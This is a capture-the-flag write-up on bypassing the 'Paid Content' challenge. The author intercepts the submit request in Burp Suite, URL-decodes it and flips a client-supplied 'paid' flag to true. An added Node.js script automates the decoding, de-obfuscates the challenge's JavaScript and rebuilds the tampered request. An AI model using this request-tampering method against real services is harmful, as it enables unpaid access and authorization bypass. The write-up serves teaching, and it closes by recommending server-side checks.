This is the third challenge in the client-side protection section of the AIS CTF Challenge Series.
Paid Content
This challenge requires me to be a paid user; it says so itself:
I’d rather not pay if I can help it! Now, I’m sure this is backed by JavaScript, but I couldn’t see anything obvious when exploring with the Firefox dev tools, so I decided to whip out Burp Suite Community and intercept the traffic.
Switching to the Proxy tab of Burp, then navigating to the AIS CTF challenge via Burp’s embedded browser, allows me to intercept requests before they reach the server and responses before they reach the browser.
Once I’ve navigated to the site and have the challenge modal open, I can enable Intercept (shown above, not highlighted) and click Submit within the web page.
This lets us inspect and modify the request (above) before it is sent to the server. At first glance it looks like a jumble of unreadable text, but it’s simply URL encoded: if we paste everything from Line 20 into CyberChef with the URL Decode operation added, we get the following:
csrfmiddlewaretoken=Tmfh0ppXwSUzsppW5pMHnDgxWHLsQteOgLmKazHhYBKJF6KjUpQkxaNXcdwkNLKl&challenge_id=paid_content&answer={"oid":"240fceddfaf241edb7bd4ad544b269c1","meta":{"points":100,"challenge_id":"paid_content","name":"Paid Content","description":"Pay for things you want!","prompt":"You must be a paid user to proceed.","category":{"value":"client_side_protections","name":"Client-side Protections"},"console_message":null,"mobile_friendly":false,"encoded":true,"error_msg":"You're not a paid user.","version":"1.0","inputs":[],"retired":false,"bin_hashes":null},"solved":false,"js_file":"CnZhciBfMHhhMDczPVsiUGFpZENvbnRlbnQiLCJ0YWcuY2hhbGxlbmdlLm9wZW4iLCJyZXNvbHZlIiwidGFnLmNoYWxsZW5nZS5zdWJtaXQiLCJzZWNfZnVuY19uYW1lX3BhaWRfY29udGVudCIsImNoYWxsZW5nZSIsInN0cmluZ2lmeSJdOyhmdW5jdGlvbigpe3dpbmRvd1tfMHhhMDczWzBdXT0gZnVuY3Rpb24oXzB4NGM5M3gxLF8weDRjOTN4Mil7aWYoXzB4NGM5M3gyPT09IF8weGEwNzNbMV0pe2xldCBfMHg0YzkzeDM9JC5EZWZlcnJlZCgpO3JldHVybiBfMHg0YzkzeDNbXzB4YTA3M1syXV0oKX1lbHNlIHtpZihfMHg0YzkzeDI9PT0gXzB4YTA3M1szXSl7cmV0dXJuIHNlY19mdW5jX25hbWVfcGFpZF9jb250ZW50KF8weDRjOTN4MSl9fTtsZXQgXzB4NGM5M3gzPSQuRGVmZXJyZWQoKTtyZXR1cm4gXzB4NGM5M3gzW18weGEwNzNbMl1dKCl9O3dpbmRvd1tfMHhhMDczWzRdXT0gZnVuY3Rpb24oXzB4NGM5M3gxKXtsZXQgXzB4NGM5M3gzPSQuRGVmZXJyZWQoKTtyZXR1cm4gXzB4NGM5M3gzW18weGEwNzNbMl1dKEpTT05bXzB4YTA3M1s2XV0oXzB4NGM5M3gxW18weGEwNzNbNV1dKSl9fSkoKQo=","js_function":"PaidContent","paid":false}
That’s a very interesting field at the end of the JSON string: "paid":false. I wonder what happens if we change that to true and then forward the request…
Turns out it’s as easy as that! A delicious 100 points, and the Client-side Protections section is complete.
I hope this post was somewhat informative; do feel free to let us know if there were any shortcuts you would have used or if you found a more elegant solution!
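The three manual steps above (URL-decode the intercepted body, read the JSON the page submits, flip "paid" and forward) as an added Node.js example; this is editor-supplied code, not part of the original write-up or the CTF platform. It starts from the decoded body printed above (the CSRF token and oid are just the post’s sample values) and goes one step further than the post by base64-decoding the "js_file" field and unpacking its string-array obfuscation, which shows why the flag is in the request at all. It assumes a Node runtime for Buffer and URLSearchParams.

```javascript
// Added example (not from the original post): reproduce the write-up's steps
// in code and peek at the client-side script the challenge ships.
// DECODED_BODY is the URL-decoded request shown in the post; the token and
// oid in it are the post's sample values, not live data.
const DECODED_BODY = `csrfmiddlewaretoken=Tmfh0ppXwSUzsppW5pMHnDgxWHLsQteOgLmKazHhYBKJF6KjUpQkxaNXcdwkNLKl&challenge_id=paid_content&answer={"oid":"240fceddfaf241edb7bd4ad544b269c1","meta":{"points":100,"challenge_id":"paid_content","name":"Paid Content","description":"Pay for things you want!","prompt":"You must be a paid user to proceed.","category":{"value":"client_side_protections","name":"Client-side Protections"},"console_message":null,"mobile_friendly":false,"encoded":true,"error_msg":"You're not a paid user.","version":"1.0","inputs":[],"retired":false,"bin_hashes":null},"solved":false,"js_file":"CnZhciBfMHhhMDczPVsiUGFpZENvbnRlbnQiLCJ0YWcuY2hhbGxlbmdlLm9wZW4iLCJyZXNvbHZlIiwidGFnLmNoYWxsZW5nZS5zdWJtaXQiLCJzZWNfZnVuY19uYW1lX3BhaWRfY29udGVudCIsImNoYWxsZW5nZSIsInN0cmluZ2lmeSJdOyhmdW5jdGlvbigpe3dpbmRvd1tfMHhhMDczWzBdXT0gZnVuY3Rpb24oXzB4NGM5M3gxLF8weDRjOTN4Mil7aWYoXzB4NGM5M3gyPT09IF8weGEwNzNbMV0pe2xldCBfMHg0YzkzeDM9JC5EZWZlcnJlZCgpO3JldHVybiBfMHg0YzkzeDNbXzB4YTA3M1syXV0oKX1lbHNlIHtpZihfMHg0YzkzeDI9PT0gXzB4YTA3M1szXSl7cmV0dXJuIHNlY19mdW5jX25hbWVfcGFpZF9jb250ZW50KF8weDRjOTN4MSl9fTtsZXQgXzB4NGM5M3gzPSQuRGVmZXJyZWQoKTtyZXR1cm4gXzB4NGM5M3gzW18weGEwNzNbMl1dKCl9O3dpbmRvd1tfMHhhMDczWzRdXT0gZnVuY3Rpb24oXzB4NGM5M3gxKXtsZXQgXzB4NGM5M3gzPSQuRGVmZXJyZWQoKTtyZXR1cm4gXzB4NGM5M3gzW18weGEwNzNbMl1dKEpTT05bXzB4YTA3M1s2XV0oXzB4NGM5M3gxW18weGEwNzNbNV1dKSl9fSkoKQo=","js_function":"PaidContent","paid":false}`;

// Step 1: application/x-www-form-urlencoded -> plain object.
// URLSearchParams percent-decodes and splits each pair on its FIRST "=",
// so the "=" padding at the end of the base64 js_file stays in the value.
// It works on the raw Burp capture and on the CyberChef output alike
// (neither contains a literal "+" here, which would decode to a space).
function parseFormBody(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Step 2a: js_file is base64 of the challenge's client-side JavaScript.
function decodeJsFile(b64) {
  return Buffer.from(b64, "base64").toString("utf8").trim();
}

// Step 2b: undo the string-array obfuscation. The script starts with
// `var _0x....=[ ... ];` and then refers to every literal as _0x....[n];
// substituting the literals back in makes the handlers readable.
function unpackStringTable(js) {
  const m = js.match(/^var (_0x[0-9a-f]+)=(\[[^\]]*\]);/);
  if (!m) throw new Error("no string table at start of script");
  const [decl, name, arrayLiteral] = m;
  const table = JSON.parse(arrayLiteral); // array of double-quoted strings
  const ref = new RegExp(name + "\\[(\\d+)\\]", "g");
  const body = js
    .slice(decl.length)
    .replace(ref, (_, i) => JSON.stringify(table[Number(i)]));
  return { table, body };
}

// Step 3: flip the client-supplied flag and re-encode the body so it can be
// pasted back into Burp's intercepted request unchanged apart from "paid".
function tamperPaid(body) {
  const fields = parseFormBody(body);
  const answer = JSON.parse(fields.answer);
  answer.paid = true;
  fields.answer = JSON.stringify(answer);
  return new URLSearchParams(fields).toString();
}

const fields = parseFormBody(DECODED_BODY);
const answer = JSON.parse(fields.answer);
const { body: readableJs } = unpackStringTable(decodeJsFile(answer.js_file));
console.log(readableJs);            // the de-obfuscated submit handler
console.log(tamperPaid(DECODED_BODY)); // body with "paid":true, URL encoded
```

Unpacking the string table shows what the client actually submits: the "tag.challenge.submit" branch hands the challenge object to sec_func_name_paid_content, which resolves with JSON.stringify of that object, so the "answer" parameter is the browser’s own copy of the challenge state, "paid":false included. Everything in that JSON is attacker-controlled, which is why flipping the flag in the proxy is enough. The check belongs on the server, which should look up the user’s paid status from its own records and ignore any "paid" value the client sends.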